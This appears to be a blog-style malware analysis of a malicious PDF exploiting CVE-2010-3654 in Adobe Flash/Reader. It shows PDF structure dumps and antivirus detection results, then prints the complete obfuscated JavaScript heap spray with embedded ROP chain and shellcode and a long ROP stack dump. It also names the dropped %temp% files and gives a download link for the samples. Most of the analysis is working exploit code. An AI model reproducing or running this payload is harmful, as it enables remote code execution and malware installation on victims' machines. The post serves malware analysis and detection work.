des :
Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010.
---
pdf file (uncompressed)
PDF Comment %PDF-1.7 PDF Comment %âãÏÓ obj 26 0 Type: Referencing: <</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>> << /Linearized 1 /L 241680 /O 29 /E 6094 /N 1 /T 241354 /H [ 513 208] >> <</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>> obj 37 0 Type: /XRef Referencing: 25 0 R, 27 0 R Contains stream <</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>> << /DecodeParms /Columns 4 /Predictor 12 >> </pre>
pdf file (compressed)
%PDF-1.7 %âãÏÓ 26 0 obj <</Linearized 1/L 241680/O 29/E 6094/N 1/T 241354/H [ 513 208]>> endobj 37 0 obj <</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<BFEF0C62A7E9A94FAAEC52A3E6C8279A><CF478FAC136BCC4BA27379A9D0BF1937>]/Index[26 47]/Info 25 0 R/Length 66/Prev 241355/Root 27 0 R/Size 73/Type/XRef/W[1 2 1]>>stream hÞbbd ``b`: $
----
virus total analyse
Antivirus Version Last Update Result AhnLab-V3 2010.11.02.00 2010.11.01 PDF/Cve-2010-3654 AntiVir 7.10.13.77 2010.11.01 - Antiy-AVL 2.0.3.7 2010.11.01 Exploit/Win32.CVE-2010-3654 Authentium 5.2.0.5 2010.11.01 - Avast 4.8.1351.0 2010.11.01 JS:Pdfka-gen Avast5 5.0.594.0 2010.11.01 JS:Pdfka-gen AVG 9.0.0.851 2010.11.02 Exploit_c.NLK BitDefender 7.2 2010.11.02 Exploit.PDF-JS.Gen CAT-QuickHeal 11.00 2010.10.26 - ClamAV 0.96.2.0-git 2010.11.02 BC.PDF.Parser-4.MalwareFound Comodo 6583 2010.11.01 - DrWeb 5.0.2.03300 2010.11.02 - Emsisoft 5.0.0.50 2010.11.02 Exploit.Win32.CVE-2010-3654!IK eSafe 7.0.17.0 2010.11.01 - eTrust-Vet 36.1.7948 2010.11.01 PDF/CVE-2010-3654!exploit F-Prot 4.6.2.117 2010.11.01 W32/Heuristic-XEN!Eldorado F-Secure 9.0.16160.0 2010.11.02 Exploit:W32/Pidief.CSR Fortinet 4.2.249.0 2010.11.01 JS/Agent.FSH!exploit GData 21 2010.11.02 Exploit.PDF-JS.Gen Ikarus T3.1.1.90.0 2010.11.02 Exploit.Win32.CVE-2010-3654 Jiangmin 13.0.900 2010.11.01 - K7AntiVirus 9.67.2882 2010.11.01 - Kaspersky 7.0.0.125 2010.11.01 Exploit.Win32.CVE-2010-3654.a McAfee 5.400.0.1158 2010.11.02 - McAfee-GW-Edition 2010.1C 2010.11.01 Heuristic.BehavesLike.PDF.Suspicious.O Microsoft 1.6301 2010.11.01 Exploit:Win32/Pdfjsc.gen!A NOD32 5583 2010.11.01 JS/Exploit.Pdfka.OKB Norman 6.06.10 2010.11.01 JS/CVE-2010-3654.A nProtect 2010-11-01.01 2010.11.01 Exploit.PDF-JS.Gen Panda 10.0.2.7 2010.11.01 Exploit/PDF.Flash.A PCTools 7.0.3.5 2010.11.02 Trojan.Pidief Prevx 3.0 2010.11.02 - Rising 22.71.06.04 2010.11.01 - Sophos 4.59.0 2010.11.02 Troj/SWFLdr-V Sunbelt 7190 2010.11.02 Exploit.PDF-JS.Gen (v) SUPERAntiSpyware 4.40.0.1006 2010.11.02 - Symantec 20101.2.0.161 2010.11.02 Trojan.Pidief TheHacker 6.7.0.1.075 2010.11.02 - TrendMicro 9.120.0.1004 2010.11.01 TROJ_PIDIEF.WV TrendMicro-HouseCall 9.120.0.1004 2010.11.02 TROJ_PIDIEF.WV VBA32 3.12.14.1 2010.11.01 - ViRobot 2010.10.4.4074 2010.11.01 PDF.S.Exploit.241679 VirusBuster 12.70.15.0 2010.11.01 - PEiD: - packers (F-Prot): XORCrypt packers (Kaspersky): Swf2Swc PDFiD: PDF Header: %PDF-1.7 obj 22 endobj 22 stream 19 endstream 19 xref 0 trailer 0 startxref 2 /Page 1 /Encrypt 0 /ObjStm 5 /JS 0 /JavaScript 0 /AA 0 /OpenAction 0 /AcroForm 0 /JBIG2Decode 0 /RichMedia 0 /Colors > 2^24 0 }
document information
content/type: PDF document, version 1.7 Object 4.0 @ 12391: suspicious.flash Embedded Flash Object 4.0 @ 12391: flash.exploit CVE-2010-3654 Object 28.0 @ 945: suspicious.obfuscation using unescape Object 28.0 @ 945: suspicious.string heap spray shellcode Object 35.0 @ 4944: suspicious.flash Adobe Shockwave Flash in a PDF define obj type
---
now about exploit
first :
this is curvedPolygon.
function drawLines():void {
var i:int;
var n:int = vecPoints.length;
var vecCmds:Vector.<int> = new Vector.<int>();
var vecCoords:Vector.<Number> = new Vector.<Number>();
for(i=0; i<n; i++) {
vecCoords[2*i] = vecPoints[i].x;
vecCoords[2*i+1] = vecPoints[i].y;
}
vecCoords[2*n] = vecPoints[0].x;
vecCoords[2*n+1] = vecPoints[0].y;
for(i=0; i<=(n/2); i++) {
vecCmds[i] = 3; // This line creates "curveTo" commands
}
vecCmds[0] = 1;
shLines.graphics.clear();
shLines.graphics.lineStyle(1,0);
shLines.graphics.beginFill(0xFF0000);
shLines.graphics.drawPath(vecCmds, vecCoords,vecWind[rbgWind.selectedData]);
shLines.graphics.endFill();
} </pre>
source code of heap spray
var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";
var s3 = "\x73\x75\x62\x73\x74\x72";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}
function s()
{
c=p(a("58585858"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c[s2](0,(0x5858-0x24)/2);
b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb07000c0c0c0c154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700909090902FE90005C300C08BD23302EB4240388075008BF9C3C2C08B8951240404EB088842400A8AC984F67500C68B002404C35A575601BE00003B0072D6300846083B4073D68BF85FC7C35E8B6430050000850078C08B0E0C40408B8B148B008B0010408BC33440808B00B8000090C33351EBD28B16C1CA03E1E183C1FF1DEACA0BD233108ACA33D18B80400038E57514898B242404C35A8B5583ECE4C456538B57085D458B890CFC45C38B81664D380F5AC28500008B003C40C30345898BF4F445388145500000850F00AB0000458B83F478C038830F009C840000830004780F00928400008B00F455528B8B7803C389D0F055558B83F0187A74008B7CF055528B032089D0E855558B8BF02452D00355898BECF055528B031C89D0E455458B8BF01878854F72FF4750F633458B8BE8B004C30337E8FFFF3BFF0C4537757D8300101D74458B8910F845458B0FEC04B78B70F05542035010FF53F8554589EBFC8B18EC45B70F7004558B8BE48204C3034589EBFC4604754F8BB3FC455E5F8B5B5DE50CC28D000040895124040CEB8040223806758940240405EB388075008BEF2404C35A8951240409EBF9807422880A40088A42840A75C9C6F10000048B5A248DC30040C4838DF82454330489C9240C028902EB02FF0A8B39807500EBF78B13800A5C390A75028B0489FF24240406EB0AFF023BE976048B5924C35A56535157F98BD88B006A806800006A006A026A00680200004000FF521253F08B006A006A006AFF562E53006A448D04248B50E8C7FDD8FFFF5750FF561653FF5622535F5A5B5E90C356535557C481FC58FFFF4C890424F28B04898B24241C7C83042475008D232444501804680001FF002A53448D18048B50E8C6FF4AFFFFD08BE858FD9AFFFF1CEB448D182468500104000053FF8D2A04448B182414C283E869FD7CFFFF006A806800006A006A036A00680100008000FF561253F08B006A806800006A006A026A00680200004000448D3024FF501253E88BFF337C83042475016A0E6A008B004E43565053FFEB2E6A0F6A008B004E4343035052FF562E53006A006A006AFF552E53448B0424E88372010F57BB8500006A008D0024445018906800018D00248401240000565053FF8D1A2484011800004B8ABA5601900000F5E8FFFC6AFF8D0024445018906800018D00248401240000555053FF811690C700013B00527BB1726AEB006A006A7568008A560053FF6A2E8D0024445018046A448D1824565053FF6A1A6A008B004E4343035052FF562E53006A448D18246A508D012444501CFF561A53448D10244B8ABA56000100007FE8FFFC6AFF8D0024445018016A448D1C24555053FF47167C3B0C24C472FF562253FF552253448B0424E88372010F0B90840000E900009F0000538D8D74248402A8000023E8FFFC8DFF74430BE8FFFC8DFF048402A80000548D18240BE8FFFC8DFF7443F3E8FFFB8BFF8DF02444E818FBE8FFFFF003848DA83400028D00CA930000E800FBE4FFFF448D182468500104000053FF8D2A04448D185F53CBE8FFFB8DFF248C02A80000548D1824048BE824FD98FFFF006A448D1C24FF502653006A53FFEB366A146A016A008D0024445024438D505A006A53FF8A4624448108A8C400035D005E5FC35B56535557C4838DF4246CC60424048B00E8D8FB9EFFFFF88B006A438B500EE857FBDCFFFFF08B7389850E74F65667438B500AE857FBC8FFFF4389830A0A7B74008D5301434589EB008B42004523E8FFFB89FF24448B080045FF500A53F88B448B08240140004514EB438B500E57568DE8FFFB8BFF0055028945830400458B8B00853075F683E30045FE04800B003BB97704C60124048A83240CC45F5D5B5E90C38B5581EC00C4FFFEE8FF000000002D583E4600404589B8FC3EAC0040450389FCF845458BE8F8FF36FFFFC0844074458BFFF8325017E8FFFCE8FFFC12FFFFD08B858DFE03FFFF21E8FFFC8DFF0395FFFEB9FF00010000458BE8F8FCAEFFFF958DFE03FFFFC933458BE8F8FC9EFFFFE58BC35DC08B6B027265656E336C0032FD89A4129B84F2502A7A38C6C54558D855450BE2EFE79554D616C0D6F74B016EDC95B929FD70A9D123B7C8AF2CB9E6FF0000000068736C65336C003241934574000000008A70000058000002007B0000706F6E657E006574706D622E74617E00652E65780000000000006970676E31203732302E302E312E2D20206E2033202661746B73696B6C6C2F206D6941207263626F7461652E65782F202066202661746B73696B6C6C2F206D6941207263526F33642E3278652065662F26202220000000220000909090900c900c0c0c0c"));
b += c;
d = b[s2](0,0x10000/2);
e = c[s2](0,0x8000-(0x1020-0x08)/2);
while(d[len] < 0x80000) d+=d;
_3 = d[s2](0,0x80000-(0x1020-0x08)/2);
_4= new Array();
_5 = new Array();
for(i=0;i<0x300;i=i+1)
for(j=0;j<16;j++)
_5[i*16+j]=e+"y";
for(i=0;i<0x300;i=i+1)
for(j=0;j<15;j++)
_5[i*16+j]=null;
for(i=0;i<0x280;i=i+1) _4[i] =_3 + "s";
}
s();
}exploit use rop technology
58585854 58585858 58585858 07002FE1 BIB.07002FE1 5858585C BEEFDEAD 58585860 FACEB00B 58585864 58585868 58585868 07004919 BIB.07004919 5858586C CCCCCCCC 58585870 070048EF BIB.070048EF 58585874 0700156F BIB.0700156F 58585878 CCCCCCCC 5858587C 07009084 BIB.07009084 58585880 07009084 BIB.07009084 58585884 07009084 BIB.07009084 58585888 07009084 BIB.07009084 5858588C 07009084 BIB.07009084 58585890 07009084 BIB.07009084 58585894 07009033 BIB.07009033 58585898 07009084 BIB.07009084 5858589C 0C0C0C0C 585858A0 07009084 BIB.07009084 585858A4 07009084 BIB.07009084 585858A8 07009084 BIB.07009084 585858AC 07009084 BIB.07009084 585858B0 07009084 BIB.07009084 585858B4 07009084 BIB.07009084 585858B8 07009084 BIB.07009084 585858BC 07009084 BIB.07009084 585858C0 07001599 BIB.07001599 585858C4 00010124 UNICODE "Q:=" 585858C8 070072F7 BIB.070072F7 585858CC 00010104 UNICODE "=N:=" 585858D0 070015BB BIB.070015BB 585858D4 00001000 585858D8 0700154D BIB.0700154D 585858DC 070015BB BIB.070015BB 585858E0 7FFE0300 585858E4 07007FB2 BIB.07007FB2 585858E8 070015BB BIB.070015BB 585858EC 00010011 585858F0 0700A8AC BIB.0700A8AC 585858F4 070015BB BIB.070015BB 585858F8 00010100 585858FC 0700A8AC BIB.0700A8AC 58585900 070072F7 BIB.070072F7 58585904 00010011 58585908 070052E2 BIB.070052E2 5858590C 07005C54 BIB.07005C54 58585910 FFFFFFFF 58585914 00010100 58585918 00000000 5858591C 00010104 UNICODE "=N:=" 58585920 00001000 58585924 00000040 58585928 0700D731 BIB.0700D731 5858592C 070015BB BIB.070015BB 58585930 9054905A 58585934 0700154D BIB.0700154D 58585938 0700A722 BIB.0700A722 5858593C 070015BB BIB.070015BB 58585940 5815EB5A 58585944 0700154D BIB.0700154D 58585948 0700A722 BIB.0700A722 5858594C 070015BB BIB.070015BB 58585950 18891A8B 58585954 0700154D BIB.0700154D 58585958 0700A722 BIB.0700A722 5858595C 070015BB BIB.070015BB 58585960 8304C083 58585964 0700154D BIB.0700154D 58585968 0700A722 BIB.0700A722 5858596C 070015BB BIB.070015BB 58585970 FB8104C2 58585974 0700154D BIB.0700154D 58585978 0700A722 BIB.0700A722 5858597C 070015BB BIB.070015BB 58585980 0C0C0C0C 58585984 0700154D BIB.0700154D 58585988 0700A722 BIB.0700A722 5858598C 070015BB BIB.070015BB 58585990 05EBEE75 58585994 0700154D BIB.0700154D 58585998 0700A722 BIB.0700A722 5858599C 070015BB BIB.070015BB 585859A0 FFFFE6E8 585859A4 0700154D BIB.0700154D 585859A8 0700A722 BIB.0700A722 585859AC 070015BB BIB.070015BB 585859B0 909090FF 585859B4 0700154D BIB.0700154D 585859B8 0700A722 BIB.0700A722 585859BC 070015BB BIB.070015BB 585859C0 90909090 585859C4 0700154D BIB.0700154D 585859C8 0700A722 BIB.0700A722 585859CC 070015BB BIB.070015BB 585859D0 90909090 585859D4 0700154D BIB.0700154D 585859D8 0700A722 BIB.0700A722 585859DC 070015BB BIB.070015BB 585859E0 90FFFFFF 585859E4 0700154D BIB.0700154D 585859E8 0700D731 BIB.0700D731 585859EC 0700112F BIB.0700112F 585859F0 90909090 585859F4 00052FE9 585859F8 C08BC300 585859FC 02EBD233 58585A00 38804240 58585A04 8BF97500 58585A08 C08BC3C2 58585A0C 24048951 58585A10 088804EB 58585A14 0A8A4240 58585A18 F675C984 58585A1C 8B0000C6 58585A20 C35A2404 58585A24 01BE5756 AcroRd_1.01BE5756 58585A28 3B000000 58585A2C 300872D6 58585A30 3B404608 58585A34 8BF873D6 58585A38 C35E5FC7 58585A3C 30058B64 58585A40 85000000 58585A44 8B0E78C0 58585A48 408B0C40 58585A4C 8B008B14 58585A50 10408B00 58585A54 34408BC3 58585A58 00B8808B AcroRd_1.00B8808B 58585A5C 90C30000 58585A60 EBD23351 58585A64 C1CA8B16 58585A68 E18303E1 58585A6C 1DEAC1FF 58585A70 D233CA0B 58585A74 CA33108A 58585A78 8040D18B 58585A7C E5750038 58585A80 8B241489 58585A84 C35A2404 58585A88 83EC8B55 58585A8C 5653E4C4 58585A90 085D8B57 58585A94 890C458B 58585A98 C38BFC45 58585A9C 4D388166 58585AA0 C2850F5A 58585AA4 8B000000 58585AA8 C3033C40 58585AAC 8BF44589 58585AB0 3881F445 58585AB4 00004550 58585AB8 00AB850F AcroRd_1.00AB850F 58585ABC 458B0000 58585AC0 78C083F4 58585AC4 0F003883 58585AC8 00009C84 58585ACC 04788300 58585AD0 92840F00 58585AD4 8B000000 58585AD8 528BF455 58585ADC 03C38B78 58585AE0 F05589D0 58585AE4 83F0558B 58585AE8 7400187A 58585AEC F0558B7C 58585AF0 0320528B 58585AF4 E85589D0 58585AF8 8BF0558B 58585AFC D0032452 58585B00 8BEC5589 58585B04 528BF055 58585B08 89D0031C 58585B0C 458BE455 58585B10 18788BF0 58585B14 72FF854F 58585B18 F6334750 58585B1C 8BE8458B 58585B20 C303B004 58585B24 FFFF37E8 58585B28 0C453BFF 58585B2C 7D833775 58585B30 1D740010 58585B34 8910458B 58585B38 458BF845 58585B3C 04B70FEC 58585B40 F0558B70 58585B44 50104203 58585B48 F855FF53 58585B4C EBFC4589 58585B50 EC458B18 58585B54 7004B70F 58585B58 8BE4558B 58585B5C C3038204 58585B60 EBFC4589 58585B64 754F4604 58585B68 FC458BB3 58585B6C 8B5B5E5F 58585B70 0CC25DE5 58585B74 00408D00 AcroRd32.00408D00 58585B78 24048951 58585B7C 80400CEB 58585B80 06752238 58585B84 24048940 58585B88 388005EB 58585B8C 8BEF7500 58585B90 C35A2404 58585B94 24048951 58585B98 F98009EB 58585B9C 880A7422 58585BA0 8A424008 58585BA4 75C9840A 58585BA8 0000C6F1 58585BAC 5A24048B 58585BB0 00408DC3 AcroRd32.00408DC3 58585BB4 8DF8C483 58585BB8 33042454 58585BBC 240C89C9 58585BC0 02EB0289 58585BC4 0A8B02FF 58585BC8 75003980 58585BCC 8B13EBF7 58585BD0 5C39800A 58585BD4 028B0A75 xpsp2res.028B0A75 58585BD8 FF240489 58585BDC 06EB2404 58585BE0 023B0AFF 58585BE4 048BE976 58585BE8 C35A5924 58585BEC 51575653 58585BF0 D88BF98B 58585BF4 8068006A 58585BF8 6A000000 58585BFC 6A006A02 58585C00 00006802 58585C04 FF524000 58585C08 F08B1253 58585C0C 006A006A 58585C10 FF56006A 58585C14 006A2E53 58585C18 0424448D 58585C1C E8C78B50 58585C20 FFFFFDD8 58585C24 FF565750 58585C28 FF561653 58585C2C 5F5A2253 58585C30 90C35B5E 58585C34 55575653 58585C38 FC58C481 58585C3C 4C89FFFF 58585C40 F28B0424 58585C44 8B240489 58585C48 7C83241C kernel32.7C83241C 58585C4C 75000424 58585C50 24448D23 58585C54 04685018 58585C58 FF000001 58585C5C 448D2A53 58585C60 8B501804 58585C64 FF4AE8C6 58585C68 D08BFFFF 58585C6C FD9AE858 58585C70 1CEBFFFF 58585C74 1824448D 58585C78 01046850 RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B 58585C7C 53FF0000 58585C80 04448D2A 58585C84 24148B18 58585C88 E869C283 58585C8C FFFFFD7C 58585C90 8068006A 58585C94 6A000000 58585C98 6A006A03 58585C9C 00006801 58585CA0 FF568000 58585CA4 F08B1253 58585CA8 8068006A 58585CAC 6A000000 58585CB0 6A006A02 58585CB4 00006802 58585CB8 448D4000 58585CBC FF503024 58585CC0 E88B1253 58585CC4 7C83FF33 kernel32.7C83FF33 58585CC8 75010424 58585CCC 6A006A0E 58585CD0 4E438B00 58585CD4 53FF5650 58585CD8 6A0FEB2E 58585CDC 8B006A00 58585CE0 43034E43 58585CE4 FF565052 58585CE8 006A2E53 58585CEC 006A006A 58585CF0 2E53FF55 58585CF4 0424448B 58585CF8 7201E883 58585CFC BB850F57 58585D00 6A000000 58585D04 24448D00 58585D08 90685018 58585D0C 8D000001 58585D10 01242484 AcroRd_1.01242484 58585D14 56500000 58585D18 8D1A53FF 58585D1C 01182484 ASCII "in control of the screen. Your keyboard and mouse input will now affect the sharer's desktop." 58585D20 4B8A0000 58585D24 0190BA56 AcroRd_1.0190BA56 58585D28 F5E80000 58585D2C 6AFFFFFC 58585D30 24448D00 58585D34 90685018 58585D38 8D000001 58585D3C 01242484 AcroRd_1.01242484 58585D40 55500000 58585D44 811653FF 58585D48 000190C7 58585D4C 527B3B00 58585D50 6AEBB172 58585D54 006A006A 58585D58 008A7568 58585D5C 53FF5600 58585D60 8D006A2E 58585D64 50182444 58585D68 448D046A 58585D6C 56501824 58585D70 6A1A53FF 58585D74 8B006A00 58585D78 43034E43 58585D7C FF565052 58585D80 006A2E53 58585D84 1824448D 58585D88 8D016A50 58585D8C 501C2444 58585D90 1A53FF56 58585D94 1024448D 58585D98 BA564B8A 58585D9C 00000001 58585DA0 FFFC7FE8 58585DA4 8D006AFF 58585DA8 50182444 58585DAC 448D016A 58585DB0 55501C24 58585DB4 471653FF 58585DB8 0C247C3B 58585DBC FF56C472 58585DC0 FF552253 58585DC4 448B2253 58585DC8 E8830424 58585DCC 0F0B7201 58585DD0 00009084 58585DD4 009FE900 RETURN to AcroRd_1.009FE900 from AcroRd_1.009FF9D6 58585DD8 538D0000 58585DDC 24848D74 58585DE0 000002A8 58585DE4 FFFC23E8 58585DE8 74438DFF 58585DEC FFFC0BE8 58585DF0 04848DFF 58585DF4 000002A8 58585DF8 1824548D 58585DFC FFFC0BE8 58585E00 74438DFF 58585E04 FFFBF3E8 58585E08 8DF08BFF 58585E0C E8182444 58585E10 FFFFFBE8 58585E14 848DF003 58585E18 0002A834 58585E1C CA938D00 58585E20 E8000000 58585E24 FFFFFBE4 58585E28 1824448D 58585E2C 01046850 RETURN to AcroRd_1.01046850 from AcroRd_1.0104FC7B 58585E30 53FF0000 58585E34 04448D2A 58585E38 5F538D18 58585E3C FFFBCBE8 58585E40 248C8DFF 58585E44 000002A8 58585E48 1824548D 58585E4C E824048B 58585E50 FFFFFD98 58585E54 448D006A 58585E58 FF501C24 58585E5C 006A2653 58585E60 EB3653FF 58585E64 6A016A14 58585E68 8D006A00 58585E6C 50242444 58585E70 505A438D 58585E74 53FF006A 58585E78 24448A46 58585E7C A8C48108 58585E80 5D000003 58585E84 C35B5E5F 58585E88 55575653 58585E8C 8DF4C483 58585E90 C604246C 58585E94 8B002404 58585E98 FB9EE8D8 58585E9C F88BFFFF 58585EA0 438B006A 58585EA4 E857500E 58585EA8 FFFFFBDC 58585EAC 7389F08B 58585EB0 74F6850E 58585EB4 438B5667 58585EB8 E857500A 58585EBC FFFFFBC8 58585EC0 830A4389 58585EC4 74000A7B 58585EC8 01438D53 ASCII "@ZU?$less@G@std@@V?$ASAllocator@U?$pair@$$CBGP8Acrobat@AFModel@@AEXABVVal@AFFramework@@@Z@std@@@@$0A@@std@@@std@@" 58585ECC EB004589 58585ED0 00458B42 58585ED4 FFFB23E8 58585ED8 244489FF 58585EDC 00458B08 58585EE0 0A53FF50 58585EE4 448BF88B 58585EE8 01400824 AcroRd_1.01400824 58585EEC 14EB0045 58585EF0 500E438B 58585EF4 8DE85756 58585EF8 8BFFFFFB 58585EFC 02890055 xpsp2res.02890055 58585F00 04004583 58585F04 8B00458B 58585F08 75F68530 58585F0C 004583E3 58585F10 800BFE04 58585F14 B977003B 58585F18 012404C6 ASCII "Resolution" 58585F1C 8324048A 58585F20 5F5D0CC4 58585F24 90C35B5E 58585F28 81EC8B55 58585F2C FFFE00C4 58585F30 0000E8FF 58585F34 2D580000 58585F38 00403E46 AcroRd32.00403E46 58585F3C B8FC4589 58585F40 00403EAC AcroRd32.00403EAC 58585F44 89FC4503 58585F48 458BF845 58585F4C FF36E8F8 58585F50 C084FFFF 58585F54 458B4074 58585F58 3250FFF8 58585F5C FFFC17E8 58585F60 FC12E8FF 58585F64 D08BFFFF 58585F68 FE03858D 58585F6C 21E8FFFF 58585F70 8DFFFFFC 58585F74 FFFE0395 58585F78 0001B9FF 58585F7C 458B0000 58585F80 FCAEE8F8 58585F84 958DFFFF 58585F88 FFFFFE03 58585F8C 458BC933 58585F90 FC9EE8F8 58585F94 E58BFFFF 58585F98 C08BC35D 58585F9C 72656B02 58585FA0 336C656E 58585FA4 FD890032 58585FA8 9B84A412 58585FAC 2A7AF250 58585FB0 C54538C6 58585FB4 554558D8 58585FB8 EFE70BE2 58585FBC D6169554 58585FC0 F74BC0D6 58585FC4 DC95016E 58585FC8 FD70B929 58585FCC 23B7A9D1 58585FD0 2CB9C8AF 58585FD4 0000E6FF 58585FD8 68730000 58585FDC 336C6C65 58585FE0 41930032 58585FE4 00004574 58585FE8 8A700000 58585FEC 58000000 58585FF0 007B0002 58585FF4 706F0000 58585FF8 7E006E65 58585FFC 706D6574 58586000 7461622E 58586004 652E7E00 58586008 00006578 5858600C 00000000 58586010 676E6970 58586014 37323120 58586018 302E302E 5858601C 2D20312E 58586020 2033206E 58586024 61742026 58586028 696B6B73 5858602C 2F206C6C 58586030 41206D69 58586034 626F7263 rt3d.626F7263 58586038 652E7461 5858603C 2F206578 58586040 20262066 58586044 6B736174 58586048 6C6C696B 5858604C 6D692F20 58586050 72634120 58586054 3364526F 58586058 78652E32 5858605C 662F2065 58586060 22202620 Annots.22202620 58586064 00220000 58586068 90900000 5858606C 0C909090 58586070 0C0C0C0C
shellcode drops in %temp% directory ~.exe , ~temp.bat, pdf named same as pdf
download files = http://www.mediafire.com/?va3mw7fe5vqygha
----------------
wisp trojan?
https://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:Win32/Wisp.A
http://www.threatexpert.com/report.aspx?md5=9f0cefe847174185030a1f027b3813ec
http://www.securityhome.eu/malware/malware.php?mal_id=897505004b9a591d6da897.20308017
refrence : news.softpedia.com
No comments:
Post a Comment